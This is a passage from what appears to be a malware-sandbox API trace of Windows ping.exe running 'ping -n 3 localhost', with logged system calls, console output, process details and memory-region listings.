_FileHandle=1, _Buf=0x95120*, _MaxCharCount=0x10 | out: _Buf=0x95120*) returned 16 [0109.655] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.655] LocalFree (hMem=0x95120) returned 0x0 [0109.655] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer="\x10<\x09") returned 0x9 [0109.655] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x93c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0109.655] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.655] _write (in: _FileHandle=1, _Buf=0x93c10*, _MaxCharCount=0x9 | out: _Buf=0x93c10*) returned 9 [0109.655] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.655] LocalFree (hMem=0x93c10) returned 0x0 [0109.655] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer=" \x8f\x09") returned 0x2 [0109.655] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x98f20, 
cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0109.655] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.655] _write (in: _FileHandle=1, _Buf=0x98f20*, _MaxCharCount=0x2 | out: _Buf=0x98f20*) returned 2 [0109.656] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.656] LocalFree (hMem=0x98f20) returned 0x0 [0109.656] Sleep (dwMilliseconds=0x3e8) [0110.660] Icmp6SendEcho2 (in: IcmpHandle=0x98b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22fa20, DestinationAddress=0xbf55e0, RequestData=0x94830, RequestSize=0x20, RequestOptions=0x22f9d0, ReplyBuffer=0x9ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x9ebb0) returned 0x1 [0110.661] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0110.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer=" Q\x09") returned 0x10 [0110.662] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x95120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0110.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.662] _write (in: _FileHandle=1, _Buf=0x95120*, _MaxCharCount=0x10 | out: _Buf=0x95120*) returned 16 [0110.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.662] LocalFree (hMem=0x95120) returned 0x0 [0110.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer="\x10<\x09") returned 0x9 [0110.662] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x93c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0110.662] _setmode (_FileHandle=1, _Mode=32768) returned 
16384 [0110.662] _write (in: _FileHandle=1, _Buf=0x93c10*, _MaxCharCount=0x9 | out: _Buf=0x93c10*) returned 9 [0110.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.662] LocalFree (hMem=0x93c10) returned 0x0 [0110.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer=" \x8f\x09") returned 0x2 [0110.662] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x98f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0110.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.662] _write (in: _FileHandle=1, _Buf=0x98f20*, _MaxCharCount=0x2 | out: _Buf=0x98f20*) returned 2 [0110.663] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.663] LocalFree (hMem=0x98f20) returned 0x0 [0110.663] Sleep (dwMilliseconds=0x3e8) [0111.713] Icmp6SendEcho2 (in: IcmpHandle=0x98b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22fa20, DestinationAddress=0xbf55e0, RequestData=0x94830, RequestSize=0x20, RequestOptions=0x22f9d0, ReplyBuffer=0x9ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x9ebb0) returned 0x1 [0111.749] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fea4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0111.749] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f9a8, nSize=0x0, Arguments=0x22f9a4 | out: lpBuffer=" Q\x09") returned 0x10 [0111.749] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x95120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0111.749] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.749] _write (in: _FileHandle=1, _Buf=0x95120*, _MaxCharCount=0x10 | out: _Buf=0x95120*) returned 16 
[0111.749] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.749] LocalFree (hMem=0x95120) returned 0x0 [0111.749] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer="\x10<\x09") returned 0x9 [0111.749] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x93c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0111.749] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.749] _write (in: _FileHandle=1, _Buf=0x93c10*, _MaxCharCount=0x9 | out: _Buf=0x93c10*) returned 9 [0111.749] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.749] LocalFree (hMem=0x93c10) returned 0x0 [0111.749] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f9ac, nSize=0x0, Arguments=0x22f9a8 | out: lpBuffer=" \x8f\x09") returned 0x2 [0111.749] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x98f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0111.749] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.749] _write (in: _FileHandle=1, _Buf=0x98f20*, _MaxCharCount=0x2 | out: _Buf=0x98f20*) returned 2 [0111.749] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.749] LocalFree (hMem=0x98f20) returned 0x0 [0111.749] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f970, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0111.750] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x22f940, nSize=0x0, Arguments=0x22f93c | out: lpBuffer="\xd0\x14\x0a") returned 0x56 [0111.750] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0xa14d0, cchDstLength=0x56 | 
out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0111.750] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.750] _write (in: _FileHandle=1, _Buf=0xa14d0*, _MaxCharCount=0x56 | out: _Buf=0xa14d0*) returned 86 [0111.750] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.750] LocalFree (hMem=0xa14d0) returned 0x0 [0111.750] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x22f950, nSize=0x0, Arguments=0x22f94c | out: lpBuffer="\xe8\x14\x0a") returned 0x61 [0111.750] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0xa14e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0111.750] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0111.750] _write (in: _FileHandle=1, _Buf=0xa14e8*, _MaxCharCount=0x61 | out: _Buf=0xa14e8*) returned 97 [0111.750] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0111.750] LocalFree (hMem=0xa14e8) returned 0x0 [0111.750] IcmpCloseHandle (IcmpHandle=0x98b40) returned 1 [0111.754] LocalFree (hMem=0x94830) returned 0x0 [0111.754] LocalFree (hMem=0x9ebb0) returned 0x0 [0111.754] WSACleanup () returned 0 [0111.880] exit (_Code=0) Thread: id = 60 os_tid = 0xd08 Thread: id = 62 os_tid = 0xd18 Thread: id = 63 os_tid = 0xd1c Process: id = "38" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16900" os_pid = "0xd10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0xcec" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 
AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5789 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5790 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5791 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5792 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5793 start_va = 0xbf0000 end_va = 0xbf7fff entry_point = 0xbf0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 5794 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5795 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5796 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5797 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 5798 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" 
Region: id = 5799 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5800 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5801 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5802 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5803 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5804 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5805 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5806 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5807 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5808 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5809 start_va = 0x76480000 
end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5810 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5811 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5812 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5813 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5814 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5815 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5816 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5817 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") 
Region: id = 5818 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5819 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 5820 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5821 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5822 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 5823 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5824 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 5825 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5826 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5827 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 5828 start_va = 0xc00000 end_va = 0x17fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 5829 start_va = 0x5c0000 end_va = 0x88efff entry_point = 0x5c0000 region_type = 
mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5830 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5831 start_va = 0x3a0000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 5875 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 5876 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 5877 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5878 start_va = 0x890000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 5943 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 5944 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5945 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5946 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type 
= mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5947 start_va = 0x920000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 5948 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 5949 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5950 start_va = 0xbb0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 5951 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 61 os_tid = 0xd14 [0109.581] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe24 | out: lpSystemTimeAsFileTime=0x18fe24*(dwLowDateTime=0x7f518a80, dwHighDateTime=0x1d440a9)) [0109.581] GetCurrentProcessId () returned 0xd10 [0109.581] GetCurrentThreadId () returned 0xd14 [0109.581] GetTickCount () returned 0x263a2 [0109.581] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe1c | out: lpPerformanceCount=0x18fe1c*=16637040030) returned 1 [0109.582] GetModuleHandleA (lpModuleName=0x0) returned 0xbf0000 [0109.582] __set_app_type (_Type=0x1) [0109.582] __p__fmode () returned 0x76b331f4 [0109.582] __p__commode () returned 0x76b331fc [0109.582] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbf2ae1) returned 0x0 [0109.582] __getmainargs (in: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8, _DoWildCard=0, _StartInfo=0xbf50e8 | out: _Argc=0xbf50d4, _Argv=0xbf50dc, _Env=0xbf50d8) returned 0 [0109.582] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.582] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 
[0109.582] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xbf5440 | out: lpWSAData=0xbf5440) returned 0 [0109.594] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x18f8b4 | out: phkResult=0x18f8b4*=0x58) returned 0x0 [0109.594] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x18f8a8, lpData=0x18f8b0, lpcbData=0x18f8ac*=0x4 | out: lpType=0x18f8a8*=0x0, lpData=0x18f8b0*=0x0, lpcbData=0x18f8ac*=0x4) returned 0x2 [0109.595] RegCloseKey (hKey=0x58) returned 0x0 [0109.595] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x18f87c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18f8a4 | out: ppResult=0x18f8a4*=0x0) returned 11001 [0109.595] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x18f87c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18f8a4 | out: ppResult=0x18f8a4*=0x1f46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x1f47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1f47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1f3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0109.732] FreeAddrInfoW (pAddrInfo=0x1f46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x1f47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1f47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x1f3a18*(sa_family=2, sin_port=0x0, 
sin_addr="127.0.0.1"), ai_next=0x0))) [0109.732] Icmp6CreateFile () returned 0x1f8b40 [0109.735] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1f4830 [0109.735] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x1febb0 [0109.736] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.736] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x18f8a4, nSize=0x0, Arguments=0x18f8a0 | out: lpBuffer="XH\x1f") returned 0x19 [0109.736] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x1f4858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0109.736] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.736] _write (in: _FileHandle=1, _Buf=0x1f4858*, _MaxCharCount=0x19 | out: _Buf=0x1f4858*) returned 25 [0109.736] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.736] LocalFree (hMem=0x1f4858) returned 0x0 [0109.736] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer="XH\x1f") returned 0x18 [0109.736] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x1f4858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0109.736] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.736] _write (in: _FileHandle=1, _Buf=0x1f4858*, _MaxCharCount=0x18 | out: _Buf=0x1f4858*) returned 24 [0109.737] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.737] LocalFree (hMem=0x1f4858) returned 0x0 [0109.737] SetConsoleCtrlHandler (HandlerRoutine=0xbf17ca, Add=1) returned 1 [0109.737] Icmp6SendEcho2 (in: IcmpHandle=0x1f8b40, Event=0x0, ApcRoutine=0x0, 
ApcContext=0x0, SourceAddress=0x18f920, DestinationAddress=0xbf55e0, RequestData=0x1f4830, RequestSize=0x20, RequestOptions=0x18f8d0, ReplyBuffer=0x1febb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1febb0) returned 0x1 [0109.738] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0109.738] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer=" Q\x1f") returned 0x10 [0109.738] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1f5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0109.738] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.738] _write (in: _FileHandle=1, _Buf=0x1f5120*, _MaxCharCount=0x10 | out: _Buf=0x1f5120*) returned 16 [0109.738] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.738] LocalFree (hMem=0x1f5120) returned 0x0 [0109.738] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer="\x10<\x1f") returned 0x9 [0109.738] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x1f3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0109.738] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.738] _write (in: _FileHandle=1, _Buf=0x1f3c10*, _MaxCharCount=0x9 | out: _Buf=0x1f3c10*) returned 9 